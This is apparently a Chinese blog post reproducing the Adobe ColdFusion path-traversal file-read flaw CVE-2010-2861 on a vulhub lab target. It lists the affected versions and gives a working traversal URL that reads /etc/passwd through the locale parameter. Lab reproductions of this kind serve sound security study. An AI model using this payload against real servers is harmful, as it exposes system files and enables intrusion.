小 白 萝 卜
小 白 萝 卜

Adobe ColdFusion 文件读取漏洞(CVE-2010-2861)

漏洞背景

Adobe ColdFusion是美国Adobe公司的一款动态Web服务器产品,其运行的CFML(ColdFusion Markup Language)是针对Web应用的一种程序设计语言。

影响版本

  • Adobe ColdFusion 8.0.1
  • Adobe ColdFusion 9.0.1
  • Adobe ColdFusion 9.0
  • Adobe ColdFusion 8.0

漏洞复现

我的环境为vulhub的靶机,启动后,需访问http://your-ip:8500/CFIDE/administrator/enter.cfm,输入密码admin,开始初始化整个环境。
Adobe ColdFusion 文件读取漏洞(CVE-2010-2861)_第1张图片

初始化完后直接访问http://your-ip:8500/CFIDE/administrator/enter.cfm?locale=../../../../../../../../../../etc/passwd%00en,在title标签处即可读取文件/etc/passwd

Adobe ColdFusion 文件读取漏洞(CVE-2010-2861)_第2张图片

你可能感兴趣的:(vulhub漏洞复现,安全)

  • 2025学年湖北省职业院校技能大赛 “信息安全管理与评估”赛项 样题卷(二) 落寞的魚丶 网络空间安全(职业技能大赛)#信息安全管理与评估赛项2025湖北职业技能大赛高职组信息安全评估赛项样题赛题网络加固
    2025学年湖北省职业院校技能大赛“信息安全管理与评估”赛项样题卷(二)第一部分:第二部分:网络安全事件响应、数字取证调查、应用程序安全任务书任务1:应急响应(可以培训有答案)任务2:通信数据分析取证(40分)任务3:基于Windows计算机单机取证(120分)第三部分应用程序安全任务4:HP代码审计(40分)第三部分:网络安全渗透、理论技能与职业素养任务一:人力资源管理系统(60分)可以培训任务
  • 2025学年湖北省职业院校技能大赛 “信息安全管理与评估”赛项 样题卷(四) 落寞的魚丶 网络空间安全(职业技能大赛)#信息安全管理与评估赛项2025职业湖北职业技能大赛职业技能大赛省赛高职组信息安全评估与管理赛项
    2025学年湖北省职业院校技能大赛“信息安全管理与评估”赛项样题卷(四)第二部分:网络安全事件响应、数字取证调查、应用程序安全任务书任务1:应急响应(可以培训有答案)任务2:通信数据分析取证(40分)任务3:基于Windows计算机单机取证(120分)任务4:PHP代码审计(40分)第三部分:网络安全渗透、理论技能与职业素养任务一:商城购物系统(60分)可以培训任务二:办公系统(60分)任务三:F
  • Spring Boot获取节假日API 涛哥是个大帅比 Spring节假日休息日节假日apispringboot工作日
    项目场景:需要知道某一天是不是节假日,或者是休息日。问题描述我们知道每年的假节日要等国家规定好,我们才能知道,所以自己是算不出的。马上想到的两个解决方法:1.通过调用互联网的节假日API(优点:方便,缺点:主动权在别人手里,万一别人的服务器出了问题,自己的服务也会受影响)2.每年自己手动配置一次(优点:安全不会出问题,缺点:麻烦)感觉都不是很完美,最后把这两种结合一下,生成的解决方案:每年年底定时
  • Solidity学习 - 断言失败 本郡主是喵 #Solidity学习区块链Solidity
    文章目录前言一、原理剖析(一)断言的作用(二)断言失败的影响(三)与require的区别二、案例分析(一)某去中心化金融(DeFi)借贷合约案例(二)某加密货币交易平台智能合约案例三、解决办法(一)正确区分assert和require的使用场景前言在Solidity智能合约开发领域,确保代码的稳健性和安全性是至关重要的。其中,断言失败漏洞是一个需要开发者高度警惕的问题,它可能会对智能合约的正常运行
  • 网络安全相关专业就业,零基础入门到精通,看这一篇分析就够了
    对于就业环境来说,都说不好,但我分析下来,其实网络安全专业还是有很多选择或出路的。有不少部门,可能很多人没有之前都没有听说过,平时也没有关注这块的招聘或者考编信息。今天,统一整理一下,方便大家获取。1、政府部门与事业单位在政府部门与事业单位中,网络安全专业毕业生有多个选择:公安局、网信办等部门:虽然工作压力较大,但待遇优厚且有编制保障。省直、市直单位信息中心:性价比高且有编制保障,是一个稳定且不错
  • 《网络攻防技术》《数据分析与挖掘》《网络体系结构与安全防护》这三个研究领域就业如何? 扣棣编程 其他网络数据分析安全
    这几个研究领域都是当前信息技术领域的热点方向,就业前景总体来说都非常不错,但各有侧重和特点。我来帮你详细分析一下:1.网络攻防技术就业前景:非常火热且持续增长。核心方向:渗透测试、漏洞挖掘与分析、恶意软件分析、入侵检测/防御、应急响应、威胁情报、安全审计、红蓝对抗等。市场需求:极高。数字化转型深入、网络攻击日益频繁和复杂(勒索软件、APT攻击、供应链攻击等)、数据安全与隐私保护法规(如GDPR、中
  • SqlServer基础学习笔记 @半夏微凉科技 技术拓展#sqlserversqlserver数据库学习笔记sqlServer学习笔记
    SqlServer基础学习笔记介绍了SQLServer数据库管理系统的基础知识,包括数据库的创建、表的设计、SQL查询语句、数据类型、索引、以及常见的管理任务等内容,适合初学者入门学习。第一章:SQLServer简介1.1SQLServer概述SQLServer是由Microsoft公司开发的关系型数据库管理系统,用于存储和管理大量数据。它提供了可靠性、安全性和高性能的数据库解决方案,广泛应用于企
  • MyBB免费论坛 v1.8.21:开源论坛搭建与管理 车英赫
    本文还有配套的精品资源,点击获取简介:MyBB免费论坛v1.8.21是一个流行的开源论坛软件,以其灵活性、易用性和功能丰富性著称。它由PHP语言编写,利用MySQL数据库存储数据,并提供了一个符合用户习惯的高效平台。MyBB具备标准的论坛布局和强大的功能特性,包括权限管理、插件系统、主题与模板定制、积分奖励系统、强大的搜索功能、邮件通知、报告系统和多语言支持。同时,MyBB注重安全性,修复了安全漏
  • ARMv8-A架构参考手册:全面解析ARM架构的未来 韦原策Noblewoman
    ARMv8-A架构参考手册:全面解析ARM架构的未来【下载地址】ARMv8-A架构参考手册探索ARMv8-A架构的终极指南,本手册深入解析了AArch64与AArch32两种执行状态,涵盖了A32、T32及A64指令集,以及异常模型、内存管理、程序员模型等核心内容。无论您是开发者还是研究人员,都能从中获取到关于ARMv8-A架构的全面知识,助您在处理器操作、系统寄存器和安全模型等领域游刃有余。通过
  • 简说 MISRA-C++ is0815 c++
    MISRA-C++是嵌入式系统中广泛采用的C++编码规范,旨在提高代码安全性、可靠性和可维护性。以下是MISRA-C++的详细要求,涵盖核心规则分类、禁用特性及最佳实践:一、核心规则分类1.语言使用限制禁用动态内存分配(new/delete、std::malloc)风险:内存碎片、分配失败导致运行时崩溃替代:静态数组、对象池或定制内存分配器禁用异常处理(try/catch/throw)风险:异常展
  • 分布式系统ID生成方案深度解析:雪花算法 vs UUID vs 其他主流方案 可曾去过倒悬山 算法后端
    分布式系统ID生成方案深度解析:雪花算法vsUUIDvs其他主流方案在分布式系统中,如何高效生成全局唯一ID是一个关键挑战。本文将深入剖析雪花算法、UUID及多种主流ID生成方案,帮助开发者根据业务场景选择最佳方案。一、为什么需要分布式ID?在分布式系统中,传统数据库自增ID存在明显瓶颈:单点故障:依赖单数据库实例扩展困难:分库分表时ID冲突安全风险:连续ID暴露业务量性能瓶颈:高并发下成为系统瓶
  • Python HTTP日志分析:Nginx/Apache日志的Python解析 华科℡云 网络协议负载均衡运维
    Web服务器日志是监控流量模式、性能瓶颈及安全威胁的关键数据源。Python凭借其丰富的库生态,可高效解析Nginx与Apache的日志格式,实现结构化数据提取与分析。日志格式解析基础Nginx默认采用combined格式,字段包括:$remote_addr(客户端IP)、$time_local(时间戳)、$request(请求方法+URL+协议)、$status(HTTP状态码)、$body_b
  • Android 跨进程通信(IPC)深度技术总结 JT-Blink Androidandroid
    1.概述Android系统基于Linux内核,采用多进程架构设计。每个Android应用默认运行在独立的进程中,拥有独立的虚拟机实例和内存空间。进程间的内存隔离机制保证了系统的稳定性和安全性,但同时也带来了进程间通信的挑战。1.1为什么需要跨进程通信系统架构需求:Android系统服务(如ActivityManagerService、WindowManagerService)运行在system_s
  • java deque linkedlist_java 中 linkedList使用 weixin_39956558 javadequelinkedlist
    java中linkedList使用1介绍2特点下面是LinkedList最重要特性:操作list元素从开始或结束反序不是线程安全每个元素是个node节点,节点保持之前和之后引用保持插入有序虽然LinkedLIst不是线程安全,我们创建线程安全版本LinkedList,调用Listlist=Collections.synchronizedList(newLinkedList(...));3比较Arr
  • Vector,ArrayList,LinkedList 的区别是什么? disciplineOneself 基础知识链表java数据结构
    前言:这个问题主要是考察集合框架的问题,主要考察三者之间设计的区别,以及使用时如何抉择。Vector线程同步(安全),ArrayList、LinkedList线程不同步(不安全)Vector是java早期提供的线程安全的动态数组;Arraylist也是动态数组,但不是线程安全的;而LinkedList与前者不同,LinkedList是使用双向链表存储的,也不是线程安全的。Vector是因为是线程安
  • 储能业 | 低成本部署!DolphinDB 打造抽水蓄能一体化解决方案 DolphinDB智臾科技 物联网数据库大数据DolphinDB实时计算抽水蓄能电力
    导语在电力行业抽水蓄电场景中,电力集团可以基于DolphinDB搭建轻量化实时数仓,有效破解高频数据写入、万亿级数据存储和秒级实时计算等核心难题。同时,该方案助力集团降本增效,提升运维效率,并实现对多个电站数据的统一管理与调度,加快数字化转型步伐。一、行业背景构建清洁低碳、安全高效的新型能源电力系统是实现“双碳”目标的一大关键任务。其中,抽水蓄能作为当前最成熟、最具规模化应用前景的物理储能技术,正
  • C#使用ExcelDataReader高效读取excel文件写入数据库 香煎三文鱼 .netcore.Net6C#C#读取excel
    分享一个库ExcelDataReader,它专注读取、支持.xls/.xlsx、内存优化。首先安装NuGet包dotnetaddpackageExcelDataReaderdotnetaddpackageSystem.Text.Encoding.CodePages编码内存优化:每次仅读取一行,适合处理百万级数据。类型安全方法:可用GetString(0)、GetDouble(1)等强类型方法(需确
  • C#哈希加密:原理、实现与应用 阿蒙Armon C#工作中的应用c#哈希算法开发语言
    C#哈希加密:原理、实现与应用在当今数字化时代,数据安全是每个应用程序都必须重视的问题。哈希加密作为一种重要的加密技术,在密码存储、数据完整性验证、数字签名等领域发挥着关键作用。本文将深入探讨C#中哈希加密的原理、常用算法以及实际应用,并通过代码示例展示如何在C#中实现哈希加密。一、哈希加密基础哈希加密(也称为哈希函数或散列函数)是一种将任意长度的输入数据转换为固定长度输出的算法。这个固定长度的输
  • 工业控制系统安全综述 罗思付之技术屋 物联网及AI前沿技术专栏安全网络web安全
    摘要工业控制系统除了应用于生产制造行业外,还广泛应用于交通、水利和电力等关键基础设施.随着工业数字化、网络化、智能化的推进,许多新技术应用于工业控制系统,提高了工业控制系统的智能化水平,但其也给工业控制系统的安全带来严峻的挑战.因此,工业控制系统的安全倍受研究人员的关注.为了让研究人员系统化地了解目前的研究进展,调研了近3年WebofScience核心数据库、EI数据库和CCF推荐网络与信息安全国
  • 鸿蒙关系型数据库实战:高效数据存储与管理 数据库harmonyos
    在鸿蒙应用开发中,关系型数据库(RDB)是结构化数据存储的核心方案。通过深度实践,其基于SQLite的轻量级实现不仅性能出色,更提供了强大的事务支持和类型安全。以下是关键经验总结:三大核心优势:SQL兼容:完整支持SQL92标准语法线程安全:内置多线程读写锁机制加密存储:支持AES-256加密敏感数据关系型数据库实战封装及使用:在Utils目录下新建一个RdbUtils文件//./src/main
  • 浅拷贝 ... 的作用 徐福记c 开发脚手架python
    浅拷贝在编程和软件开发中有重要的意义,尤其是在处理数据和对象时。以下是浅拷贝的主要意义:1.数据安全和隔离浅拷贝可以创建一个新对象,这个新对象包含原对象属性值的副本。对于基本数据类型(如数字、字符串等),浅拷贝会直接复制其值,而对于引用数据类型(如对象、数组等),它会复制引用地址。在修改新对象时,不会直接修改原对象的值(对于基本数据类型),从而保证了原数据的安全性。例如:在表格编辑场景中,通过浅拷
  • 创建没有 TPM 和安全启动的 Windows 11 可启动 USB 驱动器
    创建没有TPM和安全启动的Windows11可启动USB驱动器如果你使用的笔记本电脑或台式机系统不符合Windows11的系统要求,即没有安全启动和TPM2.0;那么这里有一个解决方案,可以创建一个Windows11的可启动USB驱动器,但会移除TPM和安全启动的要求。微软对安装Win11的用户设定了某些限制,这些用户使用的计算机没有TPM和安全启动功能。不过,既然凡事都有解决办法,这个问题也不例
  • 后端技术:利用 MySQL 实现数据加密 大厂资深架构师 SpringBoot开发实战mysql数据库ai
    后端技术:利用MySQL实现数据加密关键词:MySQL数据加密、AES加密、数据库安全、数据保护、加密算法、密钥管理、SQL注入防御摘要:本文深入探讨如何在MySQL数据库中实现数据加密,保护敏感信息免受未授权访问。我们将从加密的基本原理出发,详细讲解MySQL支持的多种加密方式,包括AES、SHA等算法的实现方法。文章包含完整的代码示例和最佳实践,帮助开发者在实际项目中应用数据加密技术,同时讨论
  • TS泛型笔记 红中马喽 笔记
    1.泛型基础概念定义:泛型是TypeScript中允许创建可复用组件的特性,这些组件可以支持多种数据类型,而非单一特定类型。核心优势:代码复用性:同一组件可处理不同类型数据类型安全:在编译阶段捕获类型错误灵活性:保持代码的灵活性同时提供强类型支持泛型函数//基础泛型函数语法functionidentity(arg:T):T{returnarg;}//使用方式constresult=identity
  • 高防IP在服务器中的作用都有哪些? wanhengidc 服务器tcp/ip网络
    高防IP作为一种通过技术手段让用户网络服务更加安全的一种IP地址,有着更高的防御能力,有着强大的流量清洗中心和防御系统,帮助企业实时监控网络流量,将恶意的用户请求识别并过滤掉,保护目标服务器不会受到网络攻击,同时还可以帮助众多企业抵御大规模的DDOS攻击。高防IP拥有着强大的防御能力,能够帮助企业抵御DDOS攻击和CC攻击等多种网络攻击,这些攻击通常会根据大量且无效的流量数据请求确定目标服务器,导
  • 对于服务器企业该如何进行搭建? wanhengidc 服务器运维
    企业搭建服务器能够实现网络服务、数据存储和管理等功能,选择大家服务器不仅能够实现高效的资源管理和对数据信息进行安全保护,还可以满足网站运行的需求,下面,小编就主要来为大家介绍一下企业该如何进行服务器搭建?搭建服务器要确保其安全性与稳定性,所以需要安全防火墙等保护措施,对进入服务器网络流量进行过滤和监控,防止一些恶意的网络攻击,并且对其进行定期更新操作系统和应用程序的补丁,及时修复潜在的安全漏洞,避
  • 探索虚拟世界的裂缝:CVE-2021-3929与3947漏洞利用工具详解 缪昱锨Hunter
    探索虚拟世界的裂缝:CVE-2021-3929与3947漏洞利用工具详解去发现同类优质开源项目:https://gitcode.com/在安全研究的最前沿,有一类工具因其独特魅力和教育价值而备受关注。今天,我们将深入探讨一个面向专业安全研究人员与对系统底层运作好奇者的开源项目——CVE-2021-3929-3947,这是一套针对特定虚拟机逃逸漏洞的实际演示代码。项目介绍本项目旨在展示如何利用已知的
  • 【安全漏洞】深入剖析CVE-2021-40444-Cabless利用链 IT老涵 安全网络漏洞安全安全漏洞网络安全
    背景CVE-2021-40444为微软MHTML远程命令执行漏洞,攻击者可通过传播MicrosoftOffice文档,诱导目标点击文档从而在目标机器上执行任意代码。该漏洞最初的利用思路是使用下载cab并释放、加载inf文件的形式执行恶意代码。独立安全研究员EduardoB.在github公开了一种新的“无CAB”的漏洞利用方法及其POC。公众号之前发布的研判文章中已对在野利用中出现的新的Cable
  • 深入剖析 CVE-2021-3560 与 CVE-2021-4034:原理、区别与联系 vortex5 安全web安全
    CVE-2021-3560和CVE-2021-4034是2021年曝光的两个Linux本地权限提升漏洞,均涉及Polkit组件。由于它们影响广泛且利用门槛较低,迅速引起安全社区关注。本文将深入分析这两个漏洞的技术原理、影响范围、区别与联系,并结合实际案例,提供缓解措施及安全建议。1.CVE-2021-3560:Polkit认证绕过漏洞1.1漏洞原理CVE-2021-3560是一个认证绕过漏洞,源于
  • 默克树技术原理 MonkeyKing.sun guava缓存
    “默克树”(MerkleTree,有时也译作“梅克尔树”)是一种树形数据结构,在区块链、分布式系统等领域广泛使用,目的是为了高效且安全地验证数据的完整性和存在性。一、什么是默克树技术原理?MerkleTree的核心原理如下:将一组数据(如交易、文件、记录等)进行哈希处理,得到数据的哈希值作为叶子节点;将相邻两个哈希值再做一次哈希,生成其父节点;不断两两组合哈希直到构造出一个最终的根哈希值(Merk
  • java封装继承多态等 麦田的设计者 javaeclipsejvmcencapsulatopn
           最近一段时间看了很多的视频却忘记总结了,现在只能想到什么写什么了,希望能起到一个回忆巩固的作用。     1、final关键字       译为:最终的        &
  • F5与集群的区别 bijian1013 weblogic集群F5
            http请求配置不是通过集群,而是F5;集群是weblogic容器的,如果是ejb接口是通过集群。         F5同集群的差别,主要还是会话复制的问题,F5一把是分发http请求用的,因为http都是无状态的服务,无需关注会话问题,类似
  • LeetCode[Math] - #7 Reverse Integer Cwind java题解MathLeetCodeAlgorithm
    原题链接:#7 Reverse Integer   要求: 按位反转输入的数字 例1: 输入 x = 123, 返回 321 例2: 输入 x = -123, 返回 -321   难度:简单   分析: 对于一般情况,首先保存输入数字的符号,然后每次取输入的末位(x%10)作为输出的高位(result = result*10 + x%10)即可。但
  • BufferedOutputStream 周凡杨
         首先说一下这个大批量,是指有上千万的数据量。      例子:      有一张短信历史表,其数据有上千万条数据,要进行数据备份到文本文件,就是执行如下SQL然后将结果集写入到文件中!      select t.msisd
  • linux下模拟按键输入和鼠标 被触发 linux
    查看/dev/input/eventX是什么类型的事件, cat /proc/bus/input/devices 设备有着自己特殊的按键键码,我需要将一些标准的按键,比如0-9,X-Z等模拟成标准按键,比如KEY_0,KEY-Z等,所以需要用到按键 模拟,具体方法就是操作/dev/input/event1文件,向它写入个input_event结构体就可以模拟按键的输入了。 linux/in
  • ContentProvider初体验 肆无忌惮_ ContentProvider
    ContentProvider在安卓开发中非常重要。与Activity,Service,BroadcastReceiver并称安卓组件四大天王。 在android中的作用是用来对外共享数据。因为安卓程序的数据库文件存放在data/data/packagename里面,这里面的文件默认都是私有的,别的程序无法访问。 如果QQ游戏想访问手机QQ的帐号信息一键登录,那么就需要使用内容提供者COnte
  • 关于Spring MVC项目(maven)中通过fileupload上传文件 843977358 mybatisspring mvc修改头像上传文件upload
    Spring MVC 中通过fileupload上传文件,其中项目使用maven管理。   1.上传文件首先需要的是导入相关支持jar包:commons-fileupload.jar,commons-io.jar 因为我是用的maven管理项目,所以要在pom文件中配置(每个人的jar包位置根据实际情况定) <!-- 文件上传 start by zhangyd-c --&g
  • 使用svnkit api,纯java操作svn,实现svn提交,更新等操作 aigo svnkit
     原文:http://blog.csdn.net/hardwin/article/details/7963318   import java.io.File; import org.apache.log4j.Logger; import org.tmatesoft.svn.core.SVNCommitInfo; import org.tmateso
  • 对比浏览器,casperjs,httpclient的Header信息 alleni123 爬虫crawlerheader
    @Override protected void doGet(HttpServletRequest req, HttpServletResponse res) throws ServletException, IOException { String type=req.getParameter("type"); Enumeration es=re
  • java.io操作 DataInputStream和DataOutputStream基本数据流 百合不是茶 java
    1,java中如果不保存整个对象,只保存类中的属性,那么我们可以使用本篇文章中的方法,如果要保存整个对象  先将类实例化  后面的文章将详细写到     2,DataInputStream 是java.io包中一个数据输入流允许应用程序以与机器无关方式从底层输入流中读取基本 Java 数据类型。应用程序可以使用数据输出流写入稍后由数据输入流读取的数据。
  • 车辆保险理赔案例 bijian1013 车险
    理赔案例: 一货运车,运输公司为车辆购买了机动车商业险和交强险,也买了安全生产责任险,运输一车烟花爆竹,在行驶途中发生爆炸,出现车毁、货损、司机亡、炸死一路人、炸毁一间民宅等惨剧,针对这几种情况,该如何赔付。 赔付建议和方案: 客户所买交强险在这里不起作用,因为交强险的赔付前提是:“机动车发生道路交通意外事故”; 如果是交通意外事故引发的爆炸,则优先适用交强险条款进行赔付,不足的部分由商业
  • 学习Spring必学的Java基础知识(5)—注解 bijian1013 javaspring
            文章来源:http://www.iteye.com/topic/1123823,整理在我的博客有两个目的:一个是原文确实很不错,通俗易懂,督促自已将博主的这一系列关于Spring文章都学完;另一个原因是为免原文被博主删除,在此记录,方便以后查找阅读。           有必要对
  • 【Struts2一】Struts2 Hello World bit1129 Hello world
    Struts2 Hello World应用的基本步骤 创建Struts2的Hello World应用,包括如下几步: 1.配置web.xml 2.创建Action 3.创建struts.xml,配置Action 4.启动web server,通过浏览器访问   配置web.xml <?xml version="1.0" encoding="
  • 【Avro二】Avro RPC框架 bit1129 rpc
    1. Avro RPC简介 1.1. RPC RPC逻辑上分为二层,一是传输层,负责网络通信;二是协议层,将数据按照一定协议格式打包和解包 从序列化方式来看,Apache Thrift 和Google的Protocol Buffers和Avro应该是属于同一个级别的框架,都能跨语言,性能优秀,数据精简,但是Avro的动态模式(不用生成代码,而且性能很好)这个特点让人非常喜欢,比较适合R
  • lua set get cookie ronin47 lua cookie
    lua: local access_token = ngx.var.cookie_SGAccessToken if access_token then ngx.header["Set-Cookie"] = "SGAccessToken="..access_token.."; path=/;Max-Age=3000" end
  • java-打印不大于N的质数 bylijinnan java
    public class PrimeNumber { /** * 寻找不大于N的质数 */ public static void main(String[] args) { int n=100; PrimeNumber pn=new PrimeNumber(); pn.printPrimeNumber(n); System.out.print
  • Spring源码学习-PropertyPlaceholderHelper bylijinnan javaspring
    今天在看Spring 3.0.0.RELEASE的源码,发现PropertyPlaceholderHelper的一个bug 当时觉得奇怪,上网一搜,果然是个bug,不过早就有人发现了,且已经修复: 详见: http://forum.spring.io/forum/spring-projects/container/88107-propertyplaceholderhelper-bug
  • [逻辑与拓扑]布尔逻辑与拓扑结构的结合会产生什么? comsci 拓扑
       如果我们已经在一个工作流的节点中嵌入了可以进行逻辑推理的代码,那么成百上千个这样的节点如果组成一个拓扑网络,而这个网络是可以自动遍历的,非线性的拓扑计算模型和节点内部的布尔逻辑处理的结合,会产生什么样的结果呢?    是否可以形成一种新的模糊语言识别和处理模型呢?  大家有兴趣可以试试,用软件搞这些有个好处,就是花钱比较少,就算不成
  • ITEYE 都换百度推广了 cuisuqiang GoogleAdSense百度推广广告外快
    以前ITEYE的广告都是谷歌的Google AdSense,现在都换成百度推广了。   为什么个人博客设置里面还是Google AdSense呢?   都知道Google AdSense不好申请,这在ITEYE上也不是讨论了一两天了,强烈建议ITEYE换掉Google AdSense。至少,用一个好申请的吧。   什么时候能从ITEYE上来点外快,哪怕少点
  • 新浪微博技术架构分析 dalan_123 新浪微博架构
    新浪微博在短短一年时间内从零发展到五千万用户,我们的基层架构也发展了几个版本。第一版就是是非常快的,我们可以非常快的实现我们的模块。我们看一下技术特点,微博这个产品从架构上来分析,它需要解决的是发表和订阅的问题。我们第一版采用的是推的消息模式,假如说我们一个明星用户他有10万个粉丝,那就是说用户发表一条微博的时候,我们把这个微博消息攒成10万份,这样就是很简单了,第一版的架构实际上就是这两行字。第
  • 玩转ARP攻击 dcj3sjt126com r
    我写这片文章只是想让你明白深刻理解某一协议的好处。高手免看。如果有人利用这片文章所做的一切事情,盖不负责。 网上关于ARP的资料已经很多了,就不用我都说了。 用某一位高手的话来说,“我们能做的事情很多,唯一受限制的是我们的创造力和想象力”。 ARP也是如此。 以下讨论的机子有 一个要攻击的机子:10.5.4.178 硬件地址:52:54:4C:98
  • PHP编码规范 dcj3sjt126com 编码规范
    一、文件格式 1. 对于只含有 php 代码的文件,我们将在文件结尾处忽略掉 "?>" 。这是为了防止多余的空格或者其它字符影响到代码。例如:<?php$foo = 'foo';2. 缩进应该能够反映出代码的逻辑结果,尽量使用四个空格,禁止使用制表符TAB,因为这样能够保证有跨客户端编程器软件的灵活性。例
  • linux 脱机管理(nohup) eksliang linux nohupnohup
    脱机管理 nohup 转载请出自出处:http://eksliang.iteye.com/blog/2166699 nohup可以让你在脱机或者注销系统后,还能够让工作继续进行。他的语法如下 nohup [命令与参数] --在终端机前台工作 nohup [命令与参数] & --在终端机后台工作   但是这个命令需要注意的是,nohup并不支持bash的内置命令,所
  • BusinessObjects Enterprise Java SDK greemranqq javaBOSAPCrystal Reports
    最近项目用到oracle_ADF  从SAP/BO 上调用 水晶报表,资料比较少,我做一个简单的分享,给和我一样的新手 提供更多的便利。   首先,我是尝试用JAVA JSP 去访问的。   官方API:http://devlibrary.businessobjects.com/BusinessObjectsxi/en/en/BOE_SDK/boesdk_ja
  • 系统负载剧变下的管控策略 iamzhongyong 高并发
    假如目前的系统有100台机器,能够支撑每天1亿的点击量(这个就简单比喻一下),然后系统流量剧变了要,我如何应对,系统有那些策略可以处理,这里总结了一下之前的一些做法。 1、水平扩展 这个最容易理解,加机器,这样的话对于系统刚刚开始的伸缩性设计要求比较高,能够非常灵活的添加机器,来应对流量的变化。 2、系统分组 假如系统服务的业务不同,有优先级高的,有优先级低的,那就让不同的业务调用提前分组
  • BitTorrent DHT 协议中文翻译 justjavac bit
    前言 做了一个磁力链接和BT种子的搜索引擎 {Magnet & Torrent},因此把 DHT 协议重新看了一遍。 BEP: 5Title: DHT ProtocolVersion: 3dec52cb3ae103ce22358e3894b31cad47a6f22bLast-Modified: Tue Apr 2 16:51:45 2013 -070
  • Ubuntu下Java环境的搭建 macroli java工作ubuntu
    配置命令:   $sudo apt-get install ubuntu-restricted-extras   再运行如下命令:   $sudo apt-get install sun-java6-jdk   待安装完毕后选择默认Java.   $sudo update- alternatives --config java   安装过程提示选择,输入“2”即可,然后按回车键确定。
  • js字符串转日期(兼容IE所有版本) qiaolevip TODateStringIE
    /** * 字符串转时间(yyyy-MM-dd HH:mm:ss) * result (分钟) */ stringToDate : function(fDate){ var fullDate = fDate.split(" ")[0].split("-"); var fullTime = fDate.split("
  • 【数据挖掘学习】关联规则算法Apriori的学习与SQL简单实现购物篮分析 superlxw1234 sql数据挖掘关联规则
    关联规则挖掘用于寻找给定数据集中项之间的有趣的关联或相关关系。 关联规则揭示了数据项间的未知的依赖关系,根据所挖掘的关联关系,可以从一个数据对象的信息来推断另一个数据对象的信息。 例如购物篮分析。牛奶 ⇒ 面包 [支持度:3%,置信度:40%] 支持度3%:意味3%顾客同时购买牛奶和面包。 置信度40%:意味购买牛奶的顾客40%也购买面包。 规则的支持度和置信度是两个规则兴
  • Spring 5.0 的系统需求,期待你的反馈 wiselyman spring
                   Spring 5.0将在2016年发布。Spring5.0将支持JDK 9。          Spring 5.0的特性计划还在工作中,请保持关注,所以作者希望从使用者得到关于Spring 5.0系统需求方面的反馈。  
按字母分类: ABCDEFGHIJKLMNOPQRSTUVWXYZ其他